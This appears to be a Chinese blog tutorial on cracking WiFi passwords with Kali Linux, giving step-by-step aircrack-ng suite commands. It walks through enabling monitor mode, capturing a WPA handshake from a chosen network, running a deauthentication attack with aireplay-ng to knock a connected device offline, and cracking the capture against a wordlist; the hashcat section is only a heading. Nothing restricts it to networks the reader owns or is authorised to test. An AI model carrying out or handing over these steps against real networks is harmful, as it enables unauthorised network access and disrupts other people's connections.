kali wifi密码 破解

一、必要设备

套餐1:装有kali系统的自带wifi网卡的笔记本
套餐2:装有windows的笔记本装虚拟机、虚拟机里面装kali、可以监控的外接wifi (必须要额外的wifi网卡,笔记本自带的网卡不行!虚拟机无法识别!)

虚拟机无法识别移动设备:
右键单击此电脑 → \rightarrow 服务 → \rightarrow VMware USB atribution 启动 → \rightarrow 重启虚拟机即可


油管Kali安装教程

二、获取握手包

油管如何获取握手包及字典破解教程

1、在虚拟机选项卡启动无线网卡并断开所有wifi连接
2、
→ \rightarrow 在桌面右键单机
→ \rightarrow 在这里打开终端
→ \rightarrow 输入 sudo -i 并输入密码启动管理员模式
→ \rightarrow 输入ifconfig查看网卡信息并记住是wlan0(不出意外就是wlan0)
→ \rightarrow 输入airmon-ng 查看网卡是否支持监听功能,出现上面的wlan0表示这个网卡支持监听功能
→ \rightarrow 输入airmon-ng check kill 关闭所有可能干扰的进程
→ \rightarrow 输入 airmon-ng start wlan0 开启监听模式
→ \rightarrow 输入ifconfig 查看监听的网卡的名称,一般为wlan0 (或者wlan0mon,此处以wlan0mon为例)
→ \rightarrow 输入airodump-ng wlan0mon 扫描当前环境中的wifi信号
→ \rightarrow 当出现待破解第wifi的名称时ctrl+c退出扫描并记录该wifi的BSSID和CH,此处假设BSSID为60:32:B1:56:3F:B2,CH为2, BSSID就是wifi的MAC地址,CH就是频段

→ \rightarrow 输入 airodump-ng -c 2 --bssid 60:32:B1:56:3F:B2 -w ~/桌面/handshakefile wlan0mon , -c后面是CH的值,–bssid后面是bssid的值,-w 后面是存放的路径以及文件名(文件后缀默认为.cap),回车后开始抓包,当有设备与该wifi完成认证后就能得到握手包。注意抓包窗口下的STATION参数就是当前与该WIFI正在连接的设备(这里假设有一个且值为:CC:08:FB:DD:42:18
)

→ \rightarrow 保持上面的抓包窗口不动,再开启一个终端窗口,输入sodo -i开启管理员权限

→ \rightarrow 输入 aireplay-ng -0 10 -a 60:32:B1:56:3F:B2 -c CC:08:FB:DD:42:18 wlan0mon
-0 表示下线
10 表示攻击次数
-a 后面就是待攻击的wifi的BSSID
-c 后面就是强迫下线的设备的STATION值
这就是进行ACK死亡攻击强迫CC:08:FB:DD:42:18这个已连接的设备下线,由于一般的设备都会自定重新连接,这样会减少等待时间

→ \rightarrow
攻击开始后一段时间 上面打开的一直在抓包的窗口会出现下图中红色框部分的信息表示握手包获取成功!ctrl+c推出抓包窗口,找到上面指定路径下保存的.cap文件,接下来就是破解这个握手包的工作了!

kali wifi密码 破解_第1张图片

三、破解握手包

握手包的破解有两种方式,一种就是跑字典,另一种就是暴力枚举
1、跑字典
将所有的字典放在一个名为password.txt文件中(这一步可以由python操作完成),将cap文件和字典文件放在桌面上

→ \rightarrow 在桌面打开终端,输入aircrack-ng -w password.txt -b 60:32:B1:56:3F:B2 handshake.cap回车即开始破解
这种方式能不能破解成功完全取决于你这个字典够不够牛逼

2、hashcat 暴力破解

你可能感兴趣的:(日常练习,网络,linux,运维)